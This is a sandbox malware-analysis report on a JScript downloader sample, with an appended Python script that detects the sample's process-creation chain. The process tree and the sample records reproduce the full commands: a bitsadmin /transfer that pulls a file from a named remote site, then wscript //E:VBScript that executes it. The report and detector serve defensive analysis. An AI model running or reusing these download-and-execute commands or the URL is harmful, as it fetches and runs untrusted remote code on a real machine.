Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64 arch:x86 image:win7-20230220-en locale:en-us os:windows7-x64 system -
submitted
22-03-2023 19:23
Static task
static1
Behavioral task
behavioral1
Sample
28-55-63-12.JS.js
Resource
win7-20230220-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
28-55-63-12.JS.js
Resource
win10v2004-20230220-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
28-55-63-12.JS.js
-
Size
120KB
-
MD5
c9d2d5758ea0bc1c82bf466b68fad4ee
-
SHA1
30daf976e08feb0ecbb6a10958d09a6e2da2bcf8
-
SHA256
b2aab26d36c289c0922a8cde64767571c9fec6daa765caee23a9b2c1fe7c0b17
-
SHA512
20f3509e7cb2ebf00e1bd0a91c4fab0981cf8b90cb088abde8da63b36f785471466503edd820acbc033fdc11832ae8e3af3d9d09257f1cd0ac19d28bc0bf983a
-
SSDEEP
384:xXWXWXWXWXWXWXWXWXWXWXWXEXWXWXWXWXWXWXWXWXWXWXWX0XWXWXWXWXWXWXWZ:i/dNx
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
description                        pid   process      target process
PID 1104 wrote to memory of 1688   1104  wscript.exe  bitsadmin.exe
PID 1104 wrote to memory of 1688   1104  wscript.exe  bitsadmin.exe
PID 1104 wrote to memory of 1688   1104  wscript.exe  bitsadmin.exe
PID 1104 wrote to memory of 268    1104  wscript.exe  wscript.exe
PID 1104 wrote to memory of 268    1104  wscript.exe  wscript.exe
PID 1104 wrote to memory of 268    1104  wscript.exe  wscript.exe
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\28-55-63-12.JS.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://theemirateshills.com//wp-includes/js/information.txt C:\Users\Admin\AppData\Local\TempVB
    - Download via BitsAdmin
  - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\TempVB
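The process tree above is a two-stage download-then-execute chain: the JScript file run by wscript.exe (PID 1104) spawns bitsadmin.exe to fetch information.txt into a local file, then spawns a second wscript.exe with //E:VBScript so that file is executed as VBScript even though it has no script extension. The following is an added example, not part of this Triage report: Python detection logic that runs those two checks over process-creation records (pid, ppid, image and command line, as carried by Sysmon Event ID 1 or 4688-style events) and correlates hits through the shared parent. The ProcEvent class, the rule names, the benign noise records and the whitespace splitting of command lines are the example's own assumptions; the three malicious records are constructed to mirror the tree above.

```python
"""Process-creation detection for the chain in this report: a script host
(wscript.exe) spawns bitsadmin.exe to fetch a file, then a second script host
runs that file with an explicit //E: engine switch.

Added example, not part of the Triage report.  Assumptions: events carry
pid/ppid/image/cmdline (Sysmon Event ID 1 or 4688-style fields); command lines
are split on whitespace, which is a simplification (real parsing needs
CommandLineToArgvW semantics for quoted paths containing spaces)."""
import re
from dataclasses import dataclass

# Script hosts that should rarely be the parent of a bitsadmin download.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Extensions WSH maps to a script engine by itself; //E: on anything else is odd.
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (surrounding quotes stripped)."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bitsadmin_download(ev: ProcEvent):
    """Flag bitsadmin /transfer jobs that pull from a remote URL."""
    if basename(ev.image) != "bitsadmin.exe":
        return None
    m = re.search(r"/transfer\b.*?(https?://\S+)\s+(\S+)", ev.cmdline, re.I)
    if not m:
        return None
    return {"rule": "bitsadmin_download", "url": m.group(1), "dest": m.group(2)}


def wscript_engine_override(ev: ProcEvent):
    """Flag wscript/cscript forced onto an engine with //E: for a file whose
    extension would not normally select that engine (e.g. no extension at all)."""
    if basename(ev.image) not in ("wscript.exe", "cscript.exe"):
        return None
    m = re.search(r"//E:(\w+)", ev.cmdline, re.I)
    if not m:
        return None
    # Drop the //switches; what remains is [image, script, script args...].
    args = [a for a in ev.cmdline.split() if not a.startswith("//")]
    script = args[1] if len(args) > 1 else ""
    if script.lower().endswith(SCRIPT_EXTS):
        return None
    return {"rule": "wscript_engine_override", "engine": m.group(1), "script": script}


RULES = (bitsadmin_download, wscript_engine_override)


def detect_chain(events):
    """Run the rules and correlate hits that share a script-host parent.

    Returns (hits, chains).  A chain is one parent that downloaded a file via
    bitsadmin and then executed that same file through wscript //E:."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is None:
                continue
            parent = by_pid.get(ev.ppid)
            hit.update(
                pid=ev.pid,
                ppid=ev.ppid,
                parent=basename(parent.image) if parent else None,
                parent_is_script_host=bool(parent and basename(parent.image) in SCRIPT_HOSTS),
            )
            hits.append(hit)
    downloads = {h["ppid"]: h for h in hits if h["rule"] == "bitsadmin_download"}
    chains = []
    for h in hits:
        if h["rule"] != "wscript_engine_override" or h["ppid"] not in downloads:
            continue
        d = downloads[h["ppid"]]
        if d["dest"].lower() == h["script"].lower():
            chains.append({"parent_pid": h["ppid"], "url": d["url"], "file": d["dest"]})
    return hits, chains


# Constructed records mirroring the report's process tree (PIDs 1104, 1688, 268)
# plus two benign events (an admin listing BITS jobs, a normal .vbs logon script).
SAMPLE_EVENTS = [
    ProcEvent(1104, 900, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\28-55-63-12.JS.js"),
    ProcEvent(1688, 1104, r"C:\Windows\System32\bitsadmin.exe",
              r'"C:\Windows\System32\bitsadmin.exe" /transfer 8 '
              r"https://theemirateshills.com//wp-includes/js/information.txt "
              r"C:\Users\Admin\AppData\Local\TempVB"),
    ProcEvent(268, 1104, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\TempVB'),
    ProcEvent(2001, 1500, r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list /allusers"),
    ProcEvent(2002, 700, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //E:VBScript \\fileserver\netlogon\logon.vbs"),
]

if __name__ == "__main__":
    found, chains = detect_chain(SAMPLE_EVENTS)
    for h in found:
        print(h)
    for c in chains:
        print("download-then-execute chain:", c)
```

The correlation keys on parent/child relationships and command lines rather than on the WriteProcessMemory signature above: a parent process writes into its child's address space as a normal part of CreateProcess, so those six IoCs on their own only restate that wscript.exe launched two children. The two benign records show the intended false-positive boundaries: bitsadmin without /transfer is not a download, and //E:VBScript on a file that already has a .vbs extension is ordinary usage.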